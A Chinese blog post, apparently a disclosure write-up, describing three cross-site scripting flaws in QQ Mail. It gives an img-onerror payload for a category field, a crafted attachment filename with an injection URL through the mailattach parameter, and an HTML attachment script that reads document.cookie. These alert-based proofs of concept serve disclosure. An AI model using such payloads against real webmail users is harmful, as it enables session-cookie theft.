QQ邮箱的三个XSS

一、详细说明:

QQ邮箱–>阅读空间–>设置–>订阅管理–>新建分类 页面

一个self xss吧

(快速跳转请戳:http://r.mail.qq.com/cgi-bin/reader_data?fun=list&t=rss_setting_feeds&s=setting&sid={你的sid})

点击新建一个分类,输入:



\x3cimg src=\x22x\x22 onerror=alert(document.cookie)\x3e

点击提交



一、详细说明:

又一个XSS,无意中发现,windows下文件名不能包含 <> ,而linux下可以,于是构造文件名 “><img src=”x” onerror=alert()> 。在QQ邮箱发信中拖拽上传,此时会弹框,然后点保存到草稿。

在QQ邮箱附件夹链接处,发现这个文件,点击文件名,弹框。出事的地址在:





http://mail.qq.com/cgi-bin/readmail?sid={你的sid}&t=compose.json&s=forward&from=attachfolder&disptype=html&ef=js&mailattach=a|a%22%3E%3Cimg+src%3D%22x%22+onerror%3Dalert%28%27xss%27%29%3E%3C

mailsttach参数过滤不严格。



一、详细说明:

QQ邮箱在上传完html格式附件后,点击附件出现预览界面,此时会执行附件中的代码。

如上传a.html内容为





<script>

 var a = document.cookie;

alert(a); 

</script>

这样一来也可以盗取用户的cookie,虽然是个self-xss,但是结合猥琐流,还是存在一定的危险

原创文章《QQ邮箱的三个XSS》,作者:Admin,未经允许不得转载。
转载或复制时,请注明出处:https://www.xuxiaokun.com/81.html,本文由 Mr.xu 博客网 整理。

发表评论

登录后才能评论
线上沟通

笔者期待与您共勉 · 互赢

有言必答:点击这里给我发消息

商务洽谈:交互沟通 · 共赢互利

邮件:admin@xuxiaokun.com

线上沟通:周一至周五 9:30 - 17:30

其余时间Mail或QQ我,有言必应。

微信关注
微信关注
投递稿件 我要留言
分享本页
返回顶部